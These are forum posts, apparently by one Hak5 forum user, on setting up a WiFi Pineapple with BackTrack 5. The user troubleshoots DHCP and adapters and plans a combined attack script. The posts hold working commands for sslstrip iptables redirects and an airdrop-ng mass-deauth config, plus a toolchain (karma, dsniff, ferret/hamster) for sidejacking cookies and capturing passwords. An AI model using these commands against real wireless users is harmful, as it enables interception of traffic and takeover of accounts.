diggler

1. My 2nd wireless adapter is used to deploy airdrop-ng for mass deauth. 2. I really dislike the GUI managers because when two wireless nic's are connected it auto connects both adapters to OPEN wifi networks. Even when /etc/init.d/interfaces remains commented. 3. I meant provide an internet source to the pineapple by first connecting the laptop itself to the internet

When manually connecting to an OPEN WiFi network using BT5R1 "dhclient wlan0" (as seen in Telot's script) (without using "NetworkManager Applet 0.8" or "Wicd Network Manager") for wlan0 I get an error. 1) Any ideas? I've searched all over and found different variations of what I'll post below but they all give me the same error: OPEN WiFi AP Cell 02 - Address: 00:10:D0:00:75:00 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=44/70 Signal level=-66 dBm Encryption key:off ESSID:"TEST" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=000002a969051235 Extra: Last beacon: 90ms ago IE: Unknown: 000D574E315F4248355F534F555448 IE: Unknown: 010882848B960C121824 IE: Unknown: 03010B IE: Unknown: 0706555320010B1B IE: Unknown: 200100 IE: Unknown: 2A0100 IE: Unknown: 32043048606C IE: Unknown: DD0900037F01010000FF7F Configuring Wifi through wlan0 interface for netbook internet access root@bt:~/Desktop# ./wlan0.sh ifconfig wlan0 down ifconfig wlan0 up iwconfig wlan0 essid "TEST" iwconfig wlan0 channel 11 iwconfig wlan0 mode managed dhclient wlan0 ERROR Internet Systems Consortium DHCP Client V3.1.3 Copyright 2004-2009 Internet Systems Consortium. All rights reserved. For info, please visit https://www.isc.org/software/dhcp/ mon0: unknown hardware address type 803 mon0: unknown hardware address type 803 Listening on LPF/wlan0/00:35:d3:88:c9:18 Sending on LPF/wlan0/00:35:d3:88:c9:18 Sending on Socket/fallback DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 4 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 7 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 13 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 10 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 10 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 14 DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3 No DHCPOFFERS received. No working leases in persistent database - sleeping. My guess is that is has something to do with "DHCPDISCOVER" looking for "255.255.255.255" and not "255.255.254.0", or the error "mon0: unknown hardware address type 803" What it looks like if I connect successfully with NetworkManager Applet 0.8 with only one wifi adapter connected wlan0 Link encap:Ethernet HWaddr 00:11:d1:18:b1:11 inet addr:192.168.20.93 Bcast:192.168.21.255 Mask:255.255.254.0 inet6 addr: fe80::225:d3ff:fe88:c818/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:108579 errors:0 dropped:0 overruns:0 frame:0 TX packets:22183 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:54172944 (54.1 MB) TX bytes:2352640 (2.3 MB) 2) Is there a way to flush and restore "NetworkManager Applet 0.8" and "Wicd Network Manager" to default settings? I'm getting all sorts of "can't obtain IP address" errors. service network-manager stop /etc/init.d/wicd stop My hardware setup is: Laptop - Teo Pro Netbook (http://zareason.com/...ro-Netbook.html) Laptop built in wireless adapter - wlan0 ath9k[mac80211]-N/A Atheros Communicaitons Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) OS - BT5 R1 Linux bt 2.6.39.4 x86_64 GNU/LINUX Pineapple - AP51 MK3 v2.0.1 2nd external wireless adapter - wlan1 Alfa (from hakshop) rtl8187[mac80211]-N/A Realtek Semiconductor Corp. RTL8187 3) Could there be a conflict between the two WiFi NIC's because they're both trying to use the "mac80211" stack at the same time?

I received this comment from the man himself... "Both use HSTS headers now, so if you're using a browser that supports them (like Chrome), there's no opportunity for sslstrip to do anything. That output is from Twisted,and it doesn't indicate any actual problem." UPDATE1: http://www.owasp.or...nsport_Security UPDATE2: SSLStrip still works against Safari Definitely broken with FF and Chrome tho : ( Now what? UPDATE3: "HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit.Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.[11] Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC."

Moved to a new thread... http://forums.hak5.org/index.php?showtopic=25330

I found that it makes a difference if: -trying to change the SSID when karma or autostart is enabled caused problems -I first disable all functionality relating to karma, then change SSID and bring it back online. I realize this may sound extremely obvious but I've observed others toggling back and forth on the WEBGUI just hitting change karma SSID and then going by to status page without first taking Karma offline. Maybe it's supposed to work no matter what but I've experienced issues performing changes without karma being disabled.

Hey Guys, Can anyone confirm the same results? When testing in my lab SSLStrip works/doesn't work with the following sites: NOTE: client browser Google chrome 17.0.963.33 beta on mac os x YES -linkedin.com -facebook.com NO -mail.google.com -twitter.com If other's get the same result. Could it be that the big co's have found a way to prevent the attack? I get the following error output from SSLStrip after visiting GMAIL. MK3 AP51 v2.0.1 /w BT5R1 cd /pentest/web/sslstrip chmod +x sslstrip.py iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 ./sslstrip.py -l 10000 -k -f tail -f sslstrip.log root@bt:~/pentest# cd /pentest/web/sslstrip/ root@bt:/pentest/web/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 root@bt:/pentest/web/sslstrip# ./sslstrip.py -l 10000 -k -f sslstrip 0.9 by Moxie Marlinspike running... Traceback (most recent call last): File "./sslstrip.py", line 105, in main reactor.run() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1170, in run self.mainLoop() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1182, in mainLoop self.doIteration(t) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 140, in doSelect _logrun(selectable, _drdw, selectable, method, dict) --- <exception caught here> --- File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 156, in _doReadOrWrite self._disconnectSelectable(selectable, why, method=="doRead") File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 191, in _disconnectSelectable selectable.readConnectionLost(f) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 508, in readConnectionLost self.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost Connection.connectionLost(self, reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost protocol.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost self.handleResponseEnd() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd HTTPClient.handleResponseEnd(self) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd self.handleResponse(B) File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 134, in handleResponse self.shutdown() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown self.client.finish() File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish "Request.finish called on a request after its connection was lost; " exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this. Traceback (most recent call last): File "./sslstrip.py", line 105, in main reactor.run() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1170, in run self.mainLoop() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1182, in mainLoop self.doIteration(t) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 140, in doSelect _logrun(selectable, _drdw, selectable, method, dict) --- <exception caught here> --- File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 156, in _doReadOrWrite self._disconnectSelectable(selectable, why, method=="doRead") File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 191, in _disconnectSelectable selectable.readConnectionLost(f) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 508, in readConnectionLost self.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost Connection.connectionLost(self, reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost protocol.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost self.handleResponseEnd() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd HTTPClient.handleResponseEnd(self) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd self.handleResponse(B) File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 134, in handleResponse self.shutdown() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown self.client.finish() File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish "Request.finish called on a request after its connection was lost; " exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

Frackin' sweet... It's going to be like Christmas all over again :) Thanks Seb

Wicked post. Thanks for going through the trouble to get those results :) Much appreciated!

The AP51 doesn't require a 12V power source to operate. It's been proven that it can run on a number of different power sources, even as low as, a USB port. As to the math of how and why? No clue.

I had the same problem. The barrel adapter that came with my AP51 MK3 didn't fit correctly. I went to my local computer store and bought a new barrel adapter. The size is 5.5mm od 2.1mm id. You'll need to remove the old and solder the new. Alternatively you can buy a USB to Barrel adapter to power the MK3 off of your laptop's USB port :)

http://forums.hak5.org/index.php?showtopic=24325

Yup, you betcha...

What if we could have SSLSTRIP or some other tool to block cookies from being sent? That would force users to log back in, because the "-k" flag doesn't seem to kill the connection to the users website as advertised.

I'm using BT5R1 fully updated and upgraded using apt-get -- its running sslstrip v0.9. I did not manually download and install. It seems to me that most users rely heavily on autocomplete +cookies + browser history. looks like my choice right now is either all these sslstrip quirks, or a certificate prompt from ettercap : / [other weird behavior i've noticed today with SSLStrip is that when my friend tries to access regular HTTP sites it displays "webpage cannot be displayed" sometimes too, in addition to that error when first browsing to HTTPS enabled sites. generally it just alerts the user that something is broken and isnt working correctly. it seem's to work after a number of refreshes] Going to try and add "ferret and hamster" to my script. However, if SSLStrip isn't running it will only capture unencrypted sessions : / So I guess SSLStrip still has to be run, which basically defeats the purpose. hmm... Are there any HTTP session hijacking (sidejacking) tools that can defeat SSL without sslstrip? maybe some other sslstrip variant, or a different sidejacking process altogether? Firesheep is another option to hamster/ferret for HTTP traffic, but i dont like how it is picky about what version of FF you have to use. In the tutorials ive been reading wireshark or ettercap are used for network traffic capture (pcap) in conjunction with hamster/ferret, but because we're using a pineapple will hamster/ferret work in real time without running a network capture tool? Can anyone explain how these apps work? it says that ferret is used to collect data seepage and im guessing hamster is the webserver configured to serve up what ferret finds?? there is no documentation on their site and it appears to be down or not well supported. There don't seem to be any "man" documentation or a README in the BTR1 directory /pentest/sniffers/hamster http://erratasec.blo...-ferret-20.html http://hamster.erratasec.com/

Does it make sense that this would happen because she was using Safari and its not well supported in SSLStrip?

Can anyone comment on the behavior of SSLStrip? After trials with three laptops (two personal and a friend) this evening I found that: -when sslstrip is running when a victims laptop is browsing the web it first displays a page that says cannot find webpage and then if you refresh the page again it will load the site. I was trying it on a friend and they just gave up trying to browse because it said the website couldn't be displayed, which was frustrating to watch knowing thats how other users might respond. -the same friend instead of typing in facebook.com for example, would use a url that was saved in history and sslstrip wouldn't redirect to the unencrypted version. -the same friend was already logged into facebook and was relying on cookies as we bounced her to different APs for internet. the "-k" flag for sslstrip was not forcing her to relogin as the feature suggests. [Mr. Protocol, that's why i suggested using ferret&hamster] -when logged into facebook.com successfully using sslstrip a huge block of code was at the top like a banner ad. Does anyone else experience these types of behavior? Is there a way to make it more fluid of an experience without those types of errors?

Telot, awesome post... Unless we are interested in being laser focused (/me queues the sharks with freakin' laser beams attached to their heads) with aireplay, why not add airdrop-ng to the WEB-GUI so we can just use our death stars tractor beam and bring in everything thats around... Snippet of code from Darren: touch deauth.conf nano deauth.conf a/00:00:00:00:00:00|any <-- mac of our AP51 AP d/any|any airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf My question still remains, from another thread, how can the pineapple keep providing internet to existing clients that you are p0wning, if you start deauthing from the web-gui and the pineapples wireless adapter? Isn't a better solution, so that timing and preventing exisiting clients from being disconnected, to use an ALFA USB and a tool running on our laptop? Unless the answer to my question, is that you can have clients connect plus do mass deauth all from the pineapple without interruptions then I think it's best to have a 2nd wireless adapter for deauthing,

Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB.

I didnt know that, but it makes a big difference in how I'm thinking of setting up my system. Can you explain why that's possible on the wireless interface of the pineapple and not the ALFA USB interface. Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread? Manny thanks Seb... Cheers...

I apologize in advance, this wll be a short reply because im on my phone. If you invest in a different hardware setup, where you have two wireless adapters (ex wan0 and wlan1) and 1 ethernet adapter you can use one to connect to to internet, one to run pineapple and karma and the spare wlan1 to issue deauths.

Most people don't login to FB, GMAIL, ETC... their cookies do it for them. The chance that you catch someone logging in is lower, than scraping cookies while their browsing, especially in a deauth scenario

1. Why is there a deauth tool on the pineapple WEBGUI then? because people are connecting through it sharing internet access but we have the ability to deauth at the same time through it... 3. Agreed : / got a little carried away there... I would really like SSLTRIP/DNSIFF/FERRET+HAMSTER to run off the bat (with airdrop-ng deauth option quickly accessible). Someone's already expressed some interest to help, so I'll post what is created in time.

1. Is it true that we can use the airdrop-ng tool to deauth at the same time, on the same wireless adapter, that we are sharing internet from (ex. wlan0/mon0)? 2. Depending on the answer either A or B will be the better hardware setup. A - laptop with BTR1 physically installed on entire disk - connect to internet with wlan0 (built in laptop wireless adapter) - deauth with wlan1 (USB wireless adapter -- ALFA) - connect to AP51 MK3 with eth0 (built in laptop wired adapter) or B - laptop with BTR1 physically installed on entire disk - connect to internet with wlan0 (built in laptop wireless adapter) - deauth with wlan0 (at the same time with same wireless adapter) - connect to AP51 MK3 with eth0 (built in laptop wired adapter) 3. I'd like to combine a number of scripts to function with this type of hardware / software setup. What I'm thinking is: -first get internet going on the laptop (wicd or command based) -run master script (wp3 on steroids) -have all tools, besides karma, run off of BT5R1 (why? because of hardware storage/power/dependency restrictions/limitations) -mk3 pineapple WEBGUI still very handy for watching connection / association / dhcp logs etc -get the wp3.sh script to autostart karma -in new steroid script setup: xterm used for window control ferret and hamster for sidejacking sslstrip for https dsniff for all other username/passwords (or ettercap) urlsnarf to monitor visited urls driftnet for fun firefox needs to be configured with a proxy of 127.0.0.1:1234 url for hamster server is http://hamster -tell these tools in a new script to log in a new folder on the desktop (or wherever) to make it easier to find all the new data instead of having to browse diff DIRs per tool 4. I like the functionality these scripts offer, but they'll need some modification -http://www.backtrack-linux.org/forums/backtrack-5-experts-section/45123-another-script-sidejacking-%5Bsidejackssl-sh%5D.html -http://teh-geek.com/?p=565 -itsm0ld's script -obviously add as much to this to wp3.sh in the right order of operations 5. Goal being, connect all HW, turn-on laptop, get an internet connection, run one script (or two), follow prompts and start watching the goodness. 6. What seems messy in all these scripts is the different IPTABLE rules for each one. I think the only rule that would need to be added to wp3.sh is the SSLSTRIP one -iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8080 7. have a terminal pop-up so you can launch airdrop-ng deauth when ready -autolaunch terminal with Darren's airdrop-ng script for mass deauth except us (but make sure we still have to hit enter, incase we dont want or need to do this off the bat) touch deauth.conf nano deauth.conf a/00:00:00:00:00:00|any <-- mac of our AP51 AP d/any|any airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf 8. assume that if the script was written now that BT5R1 had just had a apt-get update; apt-get upgrade -y done on it. updates sslstrip to .9 latest and all the tools to what we need i believe

Thanks all! Two are now on the way :) ho ho ho For anyone else who is looking to buy in different countries, or from different suppliers, the size you need is: 5.5mm od 2.1mm id

Sorry for the double post. httpCRASH has asked (as have I and others) a lot of good (but noob) questions in some of the front page threads. I think if we compiled it into a section thatt could be put on the wiki it would save a lot seb's, ghost, mr packet, djninja's time to just reference wiki. It's a pain linking to forum threads because the morph too often. What often times doesn't get written on the wiki, is the logic for WHY. There's one post in particular where httpCRASH talks through his logic really well that makes a huge difference in understanding what the interface actually does.